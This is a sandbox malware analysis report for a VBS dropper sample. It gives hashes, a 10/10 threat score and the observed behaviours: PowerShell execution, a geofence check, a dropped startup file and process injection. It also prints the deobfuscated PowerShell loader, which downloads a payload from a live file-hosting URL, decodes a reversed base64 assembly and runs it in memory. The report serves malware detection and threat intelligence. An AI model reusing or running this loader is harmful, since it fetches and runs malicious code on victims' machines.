61db47c10daf54a56360bbfa26f2127a31fadfc766220384eff41153d31d23fa

Sharing

Copy URL

Twitter E-mail

General

Target

61db47c10daf54a56360bbfa26f2127a31fadfc766220384eff41153d31d23fa.vbs
Size

12KB
Sample

241121-f2m84stmdl
MD5

8825e4591cadaec1fb1d0082f84c2398
SHA1

39fca0a522686f7b9b2b9dc5e5874aebcf231159
SHA256

61db47c10daf54a56360bbfa26f2127a31fadfc766220384eff41153d31d23fa
SHA512

d5b9c70136aaef8ca9aa1dfb32225632b69de90310ba4f9dcf35567ed58cfd6da8a6fbede4714a19ff41310af0e04bc54c7c6a95060840918efc5a31893fa2c9
SSDEEP

96:J86ymyaynXnLbv+mfupmtsgOgjAC9LFgtYif8fTFsgH2vX5bUdnL7vcumuZ4Y5Wx:JttRS/GpqDzj1eUhDH2Rb8RX1GHRkfkx

Score

10^/10

discovery execution

Malware Config

Extracted

Language

ps1

Deobfuscated

# powershell snippet 0

invoke-expression "$imageUrl = 'https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f ';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$base64Reversed = -join ($base64Command.ToCharArray() | ForEach-Object { $_ })[-1..-($base64Command.Length)];$commandBytes = [System.Convert]::FromBase64String($base64Reversed);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$vaiMethod = [dnlib.IO.Home].GetMethod('VAI');$vaiMethod.Invoke($null, @('txt.70o1jz/eom.xobtac.selif//:sptth', 'desativado', 'desativado', 'desativado', 'InstallUtil', 'desativado', 'desativado','desativado','desativado','desativado','desativado','desativado','1','desativado'));"

# powershell snippet 1

$imageurl = "https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f "

$webclient = new-object system.net.webclient

$imagebytes = $webclient.downloaddata("https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f ")

$imagetext = ([system.text.encoding]::ascii).getstring($imagebytes)

$startflag = "<<BASE64_START>>"

$endflag = "<<BASE64_END>>"

$startindex = $imagetext.indexof("<<BASE64_START>>")

$endindex = $imagetext.indexof("<<BASE64_END>>")

$startindex -ge 0 -and $endindex -gt $startindex

$startindex = $startflag.length

$base64length = $endindex - $startindex

$base64command = $imagetext.substring($startindex, $base64length)

$base64reversed = -join $base64command.tochararray()|%{$_}[-(1..)($base64command.length)]

$commandbytes = [system.convert]::frombase64string($base64reversed)

$loadedassembly = [system.reflection.assembly]::load($commandbytes)

$vaimethod = ([dnlib.io.home]).getmethod("VAI")

URLs

ps1.dropper

https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f

exe.dropper

https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f

Targets

- Target
  
  61db47c10daf54a56360bbfa26f2127a31fadfc766220384eff41153d31d23fa.vbs
- Size
  
  12KB
- MD5
  
  8825e4591cadaec1fb1d0082f84c2398
- SHA1
  
  39fca0a522686f7b9b2b9dc5e5874aebcf231159
- SHA256
  
  61db47c10daf54a56360bbfa26f2127a31fadfc766220384eff41153d31d23fa
- SHA512
  
  d5b9c70136aaef8ca9aa1dfb32225632b69de90310ba4f9dcf35567ed58cfd6da8a6fbede4714a19ff41310af0e04bc54c7c6a95060840918efc5a31893fa2c9
- SSDEEP
  
  96:J86ymyaynXnLbv+mfupmtsgOgjAC9LFgtYif8fTFsgH2vX5bUdnL7vcumuZ4Y5Wx:JttRS/GpqDzj1eUhDH2Rb8RX1GHRkfkx
Score

10^/10

discovery execution
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
  Using powershell.exe command.
  execution
- Checks computer location settings
  Looks up country code configured in the registry, likely geofence.
- Drops startup file
- Suspicious use of SetThreadContext
behavioral1 behavioral2